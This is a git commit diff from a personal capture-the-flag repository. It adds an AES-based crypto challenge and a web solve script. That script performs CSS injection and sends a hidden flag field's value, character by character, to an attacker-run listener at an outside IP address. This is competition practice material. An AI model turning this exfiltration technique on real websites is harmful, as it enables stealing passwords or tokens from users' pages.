ctf commits
This commit is contained in:
2
.gitignore
vendored
Normal file
2
.gitignore
vendored
Normal file
@@ -0,0 +1,2 @@
|
||||
|
||||
htb/cyber_apocalypse_2024/pwn/pwn_sound_of_silence/challenge/
|
||||
BIN
catthegrey24/.DS_Store
vendored
Normal file
BIN
catthegrey24/.DS_Store
vendored
Normal file
Binary file not shown.
1
catthegrey24/crypto/filter_ciphertext/.gitignore
vendored
Normal file
1
catthegrey24/crypto/filter_ciphertext/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.venv/
|
||||
77
catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py
Normal file
77
catthegrey24/crypto/filter_ciphertext/filter_ciphertext.py
Normal file
@@ -0,0 +1,77 @@
|
||||
from Crypto.Cipher import AES
|
||||
import os
|
||||
|
||||
with open("flag.txt", "r") as f:
|
||||
flag = f.read()
|
||||
|
||||
BLOCK_SIZE = 16
|
||||
iv = os.urandom(BLOCK_SIZE)
|
||||
|
||||
xor = lambda x, y: bytes(a^b for a,b in zip(x,y))
|
||||
|
||||
key = os.urandom(16)
|
||||
|
||||
def encrypt(pt):
|
||||
cipher = AES.new(key=key, mode=AES.MODE_ECB)
|
||||
blocks = [pt[i:i+BLOCK_SIZE] for i in range(0, len(pt), BLOCK_SIZE)]
|
||||
tmp = iv
|
||||
ret = b""
|
||||
|
||||
for block in blocks:
|
||||
res = cipher.encrypt(xor(block, tmp))
|
||||
ret += res
|
||||
tmp = xor(block, res)
|
||||
|
||||
return ret
|
||||
|
||||
|
||||
def decrypt(ct):
|
||||
cipher = AES.new(key=key, mode=AES.MODE_ECB)
|
||||
blocks = [ct[i:i+BLOCK_SIZE] for i in range(0, len(ct), BLOCK_SIZE)]
|
||||
|
||||
for block in blocks:
|
||||
if block in secret_enc:
|
||||
blocks.remove(block)
|
||||
|
||||
tmp = iv
|
||||
ret = b""
|
||||
|
||||
for block in blocks:
|
||||
res = xor(cipher.decrypt(block), tmp)
|
||||
ret += res
|
||||
tmp = xor(block, res)
|
||||
|
||||
return ret
|
||||
|
||||
secret = os.urandom(80)
|
||||
secret_enc = encrypt(secret)
|
||||
|
||||
print(f"Encrypted secret: {secret_enc.hex()}")
|
||||
|
||||
print("Enter messages to decrypt (in hex): ")
|
||||
|
||||
while True:
|
||||
res = input("> ")
|
||||
|
||||
try:
|
||||
enc = bytes.fromhex(res)
|
||||
|
||||
if (enc == secret_enc):
|
||||
print("Nice try.")
|
||||
continue
|
||||
|
||||
dec = decrypt(enc)
|
||||
if (dec == secret):
|
||||
print(f"Wow! Here's the flag: {flag}")
|
||||
break
|
||||
|
||||
else:
|
||||
print(dec.hex())
|
||||
|
||||
except Exception as e:
|
||||
print(e)
|
||||
continue
|
||||
|
||||
|
||||
|
||||
|
||||
BIN
catthegrey24/web/.DS_Store
vendored
Normal file
BIN
catthegrey24/web/.DS_Store
vendored
Normal file
Binary file not shown.
1
catthegrey24/web/beautiful_styles/.gitignore
vendored
Normal file
1
catthegrey24/web/beautiful_styles/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.venv/*
|
||||
51
catthegrey24/web/beautiful_styles/enumeration.py
Normal file
51
catthegrey24/web/beautiful_styles/enumeration.py
Normal file
@@ -0,0 +1,51 @@
|
||||
import string
|
||||
import requests
|
||||
import re
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from urllib.parse import unquote
|
||||
|
||||
|
||||
chars = string.ascii_uppercase + string.digits + "f"
|
||||
url = "http://challs2.nusgreyhats.org:33339"
|
||||
headers = {"Content-Type": "application/x-www-form-urlencoded"}
|
||||
|
||||
|
||||
class LeakHandler(BaseHTTPRequestHandler):
|
||||
def do_GET(self):
|
||||
print("Got GET request")
|
||||
leaked_password = unquote(self.path.split("/")[-1])
|
||||
print(f"Password: {leaked_password}")
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(b"exploiting in progress")
|
||||
print("Next round")
|
||||
leak_char(leaked_password)
|
||||
|
||||
|
||||
def generate_css_input(leaked_password):
|
||||
css_input = ""
|
||||
|
||||
for a in chars:
|
||||
css_input += f'input[id="flag"][value^="{leaked_password + a}"]{{background-image: url(http://49.12.225.44:8000/{leaked_password + a});}}'
|
||||
|
||||
return css_input
|
||||
|
||||
|
||||
def leak_char(leaked_password):
|
||||
css_input = generate_css_input(leaked_password)
|
||||
print("Leaking character")
|
||||
with requests.post(
|
||||
f"{url}/submit", data={"css_value": css_input}, headers=headers
|
||||
) as r:
|
||||
match = re.search(r"/judge/([a-zA-Z0-9-]+)", r.text)
|
||||
if match:
|
||||
id_value = match.group(1)
|
||||
print("Found ID:", id_value)
|
||||
r = requests.post(f"http://challs2.nusgreyhats.org:33339/judge/{id_value}")
|
||||
print(r.text)
|
||||
else:
|
||||
print("error")
|
||||
|
||||
|
||||
httpd = HTTPServer(("0.0.0.0", 8000), LeakHandler)
|
||||
httpd.serve_forever()
|
||||
@@ -1,3 +1,3 @@
|
||||
#!/bin/sh
|
||||
docker build --tag=sound_of_silence .
|
||||
docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence
|
||||
docker run -it -p 1337:1337 --rm --name=sound_of_silence sound_of_silence
|
||||
Reference in New Issue
Block a user